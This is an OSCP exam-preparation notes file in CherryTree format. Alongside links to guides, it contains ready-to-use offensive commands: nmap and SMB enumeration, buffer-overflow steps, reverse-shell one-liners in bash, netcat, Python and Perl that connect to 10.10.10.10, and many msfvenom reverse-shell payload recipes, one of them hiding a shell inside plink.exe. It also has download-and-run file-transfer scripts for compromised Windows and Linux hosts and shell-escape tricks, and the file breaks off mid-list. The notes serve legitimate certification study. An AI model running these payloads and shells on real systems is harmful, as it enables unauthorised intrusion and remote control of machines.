-
Notifications
You must be signed in to change notification settings - Fork 10
/
OSCP_Links.ctd
554 lines (470 loc) · 29.8 KB
/
OSCP_Links.ctd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="General" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569178799.39" ts_lastsave="1572362312.97" unique_id="1">
<rich_text>• Exploit interpreter fix: </rich_text>
<rich_text link="webs https://askubuntu.com/questions/304999/not-able-to-execute-a-sh-file-bin-bashm-bad-interpreter">https://askubuntu.com/questions/304999/not-able-to-execute-a-sh-file-bin-bashm-bad-interpreter</rich_text>
<rich_text>
• Oscp repo: </rich_text>
<rich_text link="webs https://github.com/rewardone/OSCPRepo">https://github.com/rewardone/OSCPRepo</rich_text>
<rich_text>
• Pentest compilation: </rich_text>
<rich_text link="webs https://github.com/adon90/pentest_compilation">https://github.com/adon90/pentest_compilation</rich_text>
<rich_text>
• Command Templates: </rich_text>
<rich_text link="webs https://pentest.ws">https://pentest.ws</rich_text>
<rich_text>
• Password Lists: </rich_text>
<rich_text link="webs https://github.com/danielmiessler/SecLists">https://github.com/danielmiessler/SecLists</rich_text>
<rich_text>
• Automated OSCP reconnaissance tool: </rich_text>
<rich_text link="webs https://github.com/codingo/Reconnoitre">https://github.com/codingo/Reconnoitre</rich_text>
<rich_text>
• OSCP Report Template: </rich_text>
<rich_text link="webs https://github.com/whoisflynn/OSCP-Exam-Report-Template">https://github.com/whoisflynn/OSCP-Exam-Report-Template</rich_text>
<rich_text>
• OSCP Scripts: </rich_text>
<rich_text link="webs https://github.com/ihack4falafel/OSCP">https://github.com/ihack4falafel/OSCP</rich_text>
<rich_text>
• Pentesting resource: </rich_text>
<rich_text link="webs https://guif.re/">https://guif.re/</rich_text>
<rich_text>
• FTP Binary mode: </rich_text>
<rich_text link="webs https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files">https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files</rich_text>
<rich_text>
• Pentesting Cheatsheet: </rich_text>
<rich_text link="webs https://ired.team/">https://ired.team/</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Proof" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569753850.79" ts_lastsave="1572353752.83" unique_id="7">
<rich_text>•</rich_text>
<rich_text weight="heavy"> Linux Proof:</rich_text>
<rich_text> cat proof.txt && hostname && id && whoami && /sbin/ifconfig
• </rich_text>
<rich_text weight="heavy">Windows Proof:</rich_text>
<rich_text> hostname && whoami.exe && whoami.exe /groups && type proof.txt && ipconfig /all</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="OSCP Guides" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572356602.53" ts_lastsave="1572356702.94" unique_id="11">
<rich_text>•</rich_text>
<rich_text weight="heavy"> A Detailed Guide on OSCP Preparation – From Newbie to OSCP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/">https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Passing OSCP</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html">https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">OSCP Journey exam</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://h4ck.co/oscp-journey-exam-lab-prep-tips/">https://h4ck.co/oscp-journey-exam-lab-prep-tips/</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> OSCP Review</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://hackmethod.com/oscp-review-tips/">https://hackmethod.com/oscp-review-tips/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Pentesting Prep for OSCP:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/moshekaplan/pentesting_notes/blob/master/OSCP_prep.md">https://github.com/moshekaplan/pentesting_notes/blob/master/OSCP_prep.md</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Commands" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362312.97" ts_lastsave="1572614020.8" unique_id="12">
<rich_text>• Nmap All TCP Ports: nmap -p 1-65535 -T4 -A -v -Pn -oA fullportscan
• Nmap Intense Scan: nmap -T4 -A -v -Pn -oA Intensescan
• Quick UDP Scan: nmap -sU -sV -vv -oA quick_udp
• Port knock: for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
• Netcat banner grab: nc -v 10.10.10.10 port
• Telnet banner grab: telnet 10.10.10.10 port
• Dirsearch: cd ~/OSCP/Tools/dirsearch/ && ./dirsearch.py -u </rich_text>
<rich_text link="webs http://google.com">http://google.com</rich_text>
<rich_text> -e /
• Gobuster: gobuster dir -u </rich_text>
<rich_text link="webs https://google.com">https://google.com</rich_text>
<rich_text> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
◇ Gobuster quick directory busting: gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
◇ Gobuster comprehensive directory busting: gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
◇ Gobuster search with file extension: gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
• SMB Scans:
☐ smbmap IP
☐ SMB vulnerability scan: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
☐ SMB Users & Shares Scan: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
☐ Enum4linux: enum4linux -a 10.10.10.10
☐ Null connect: rpcclient -U "" 10.10.10.10
☐ Connect to SMB share: smbclient //MOUNT/share
• SNMP enumeration: snmp-check 10.10.10.10
• Web Scans:
nikto -h
wpscan -u
• </rich_text>
<rich_text weight="heavy">Easy Web Server:</rich_text>
<rich_text> python -m SimpleHTTPServer 80
• </rich_text>
<rich_text weight="heavy">Easy FTP server</rich_text>
<rich_text>: python -m pyftpdlib -p 21 -w
• Non-interactive execute </rich_text>
<rich_text weight="heavy">powershell</rich_text>
<rich_text> file: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1</rich_text>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Buffer Overflow" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572356166.41" ts_lastsave="1572363094.57" unique_id="10">
<rich_text>• </rich_text>
<rich_text weight="heavy">Buffer Overflow video</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://www.youtube.com/watch?v=OOkU7to0Ty4">https://www.youtube.com/watch?v=OOkU7to0Ty4</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Commands" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572363010.91" ts_lastsave="1572363014.33" unique_id="15">
<rich_text>#Create a pattern depending on the buffer size that crashes the application
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#Find the exact buffer size that crashes the application by supplying the EIP contents after the crash with the supplied pattern
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
#We test the bad characters by supplying all the hex characters with our exploit
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
#We execute the following in the imunity debugger white field
!mona modules
#Run this script to find the hex equivalent of jmp esp
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
#We execute the following in imunity
!mona find -s "\xff\xe4" -m slmfc.dll
#We generate our shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.167 LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"</rich_text>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Offensive Security Links" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572340238.17" ts_lastsave="1572340772.27" unique_id="9">
<rich_text>• OSCP Certification Exam Guide: </rich_text>
<rich_text link="webs https://support.offensive-security.com/oscp-exam-guide/">https://support.offensive-security.com/oscp-exam-guide/</rich_text>
<rich_text>
• Proctored Exam Guide: </rich_text>
<rich_text link="webs https://www.offensive-security.com/faq/#proc-1">https://www.offensive-security.com/faq/#proc-1</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs https://support.offensive-security.com/proctoring-faq/">https://support.offensive-security.com/proctoring-faq/</rich_text>
<rich_text>
• OSCP Exam FAQ: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2191-FAQ-Questions-about-the-OSCP-Exam">https://forums.offensive-security.com/showthread.php?2191-FAQ-Questions-about-the-OSCP-Exam</rich_text>
<rich_text>
• Common Technical Issues: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2190-Common-Technical-Issues">https://forums.offensive-security.com/showthread.php?2190-Common-Technical-Issues</rich_text>
<rich_text>
• General Questions: </rich_text>
<rich_text link="webs https://forums.offensive-security.com/showthread.php?2189-General-questions-about-the-PWK-course">https://forums.offensive-security.com/showthread.php?2189-General-questions-about-the-PWK-course</rich_text>
<rich_text>
• Network Introduction Guide: </rich_text>
<rich_text link="webs https://support.offensive-security.com/pwk-network-intro-guide/">https://support.offensive-security.com/pwk-network-intro-guide/</rich_text>
<rich_text>
</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Web" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569786369.67" ts_lastsave="1572356239.73" unique_id="8">
<rich_text>• </rich_text>
<rich_text weight="heavy">LFI/RFI:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#basic-rfi">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#basic-rfi</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">MSSQL Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://www.exploit-db.com/papers/12975">https://www.exploit-db.com/papers/12975</rich_text>
<rich_text>
◇ MSSQL Union Based Injection: </rich_text>
<rich_text link="webs http://www.securityidiots.com/Web-Pentest/SQL-Injection/MSSQL/MSSQL-Union-Based-Injection.html">http://www.securityidiots.com/Web-Pentest/SQL-Injection/MSSQL/MSSQL-Union-Based-Injection.html</rich_text>
<rich_text>
◇ MSSQL SQL Injection Cheat Sheet: </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> MySQL Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">MongoDB Nosql Injection:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://security.stackexchange.com/questions/83231/mongodb-nosql-injection-in-python-code">https://security.stackexchange.com/questions/83231/mongodb-nosql-injection-in-python-code</rich_text>
<rich_text>
</rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet">http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179105.17" ts_lastsave="1572467773.87" unique_id="2">
<rich_text>• </rich_text>
<rich_text weight="heavy">General Enumeration - Common port checks:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.0daysecurity.com/penetration-testing/enumeration.html">http://www.0daysecurity.com/penetration-testing/enumeration.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Nmap Scripts:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://nmap.org/nsedoc/">https://nmap.org/nsedoc/</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Shell Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179180.75" ts_lastsave="1572613669.18" unique_id="3">
<rich_text>•</rich_text>
<rich_text weight="heavy"> Reverse Shell</rich_text>
<rich_text> Cheat Sheet: </rich_text>
<rich_text link="webs http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</rich_text>
<rich_text>
◇ More Reverse Shells: </rich_text>
<rich_text link="webs https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/">https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/</rich_text>
<rich_text>
◇ Even More Reverse shells: </rich_text>
<rich_text link="webs https://delta.navisec.io/reverse-shell-reference/">https://delta.navisec.io/reverse-shell-reference/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Spawning TTY Shell:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://netsec.ws/?p=337">https://netsec.ws/?p=337</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Metasploit payloads (msfvenom):</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://netsec.ws/?p=331">https://netsec.ws/?p=331</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> Best Web Shells</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://www.1337pwn.com/best-php-web-shells/">https://www.1337pwn.com/best-php-web-shells/</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs https://github.com/artyuum/Simple-PHP-Web-Shell">https://github.com/artyuum/Simple-PHP-Web-Shell</rich_text>
<rich_text>
◇ </rich_text>
<rich_text link="webs http://www.topshellv.com/">http://www.topshellv.com/</rich_text>
<rich_text>
•</rich_text>
<rich_text weight="heavy"> Escape from SHELLcatraz</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=10">https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells?slide=10</rich_text>
<rich_text>
</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Reverse Shells" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362853.62" ts_lastsave="1572613373.5" unique_id="13">
<rich_text>• bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
• rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
• nc -e /bin/sh 10.10.10.10 4443
• nc -e cmd.exe 10.10.10.10 4443
• python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
• perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Spawn TTY Shells" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613544.53" ts_lastsave="1572613599.18" unique_id="22">
<rich_text>• python -c 'import pty; pty.spawn("/bin/sh")'
• echo os.system('/bin/bash')
• /bin/sh -i
• perl —e 'exec "/bin/sh";'
• perl: exec "/bin/sh";
• ruby: exec "/bin/sh"
• lua: os.execute('/bin/sh')
• (From within IRB): exec "/bin/sh"
• (From within vi): :!bash
• (From within vi): :set shell=/bin/bash:shell
• (From within nmap): !sh</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="msfvenom payloads" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572362943.32" ts_lastsave="1572362944.62" unique_id="14">
<rich_text># PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="File Transfers" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613669.18" ts_lastsave="1572613749.56" unique_id="23">
<rich_text></rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="HTTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613677.82" ts_lastsave="1572613682.87" unique_id="24">
<rich_text># In Kali
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget 10.10.10.10/file
# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="FTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613691.78" ts_lastsave="1572613696.54" unique_id="25">
<rich_text># In Kali
python -m pyftpdlib -p 21 -w
# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute
ftp -v -n -s:ftp.txt
“Name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows.”</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="TFTP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613730.76" ts_lastsave="1572613736.09" unique_id="26">
<rich_text># In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i 10.10.10.10 GET nc.exe</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="VBS" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1572613749.56" ts_lastsave="1572613772.58" unique_id="27">
<rich_text>If FTP/TFTP fails you, this wget script in VBS is the go to on Windows machines.
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe</rich_text>
</node>
</node>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Privilege Escalation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179376.52" ts_lastsave="1572356018.41" unique_id="4">
<rich_text>Common priviledge escalation exploits and scripts: </rich_text>
<rich_text link="webs https://github.com/AusJock/Privilege-Escalation">https://github.com/AusJock/Privilege-Escalation</rich_text>
<rich_text>
</rich_text>
<node custom_icon_id="0" foreground="" is_bold="False" name="Linux" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179386.29" ts_lastsave="1572356447.65" unique_id="5">
<rich_text>• </rich_text>
<rich_text weight="heavy">Linux EoP (Best privesc):</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://guif.re/linuxeop">https://guif.re/linuxeop</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Basic Linux Privilege Escalation</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">unix-privesc-check</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">linuxprivchecker.py:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.securitysift.com/download/linuxprivchecker.py">http://www.securitysift.com/download/linuxprivchecker.py</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Linux Enumeration:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">pspy:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/DominicBreuker/pspy">https://github.com/DominicBreuker/pspy</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Linux Priv Checker:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://github.com/sleventyeleven/linuxprivchecker">https://github.com/sleventyeleven/linuxprivchecker</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Kernel Exploits</rich_text>
<rich_text>: </rich_text>
<rich_text link="webs https://github.com/lucyoa/kernel-exploits">https://github.com/lucyoa/kernel-exploits</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">PrivEsc binaries:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs https://gtfobins.github.io/">https://gtfobins.github.io/</rich_text>
</node>
<node custom_icon_id="0" foreground="" is_bold="False" name="Windows" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1569179638.15" ts_lastsave="1572356540.62" unique_id="6">
<rich_text>• </rich_text>
<rich_text weight="heavy">Windows Privilege Escalation Fundamentals:</rich_text>
<rich_text> </rich_text>
<rich_text link="webs http://www.fuzzysecurity.com/tutorials/16.html">http://www.fuzzysecurity.com/tutorials/16.html</rich_text>
<rich_text>
• </rich_text>
<rich_text weight="heavy">Windows-Exploit-Suggester:</rich_text>
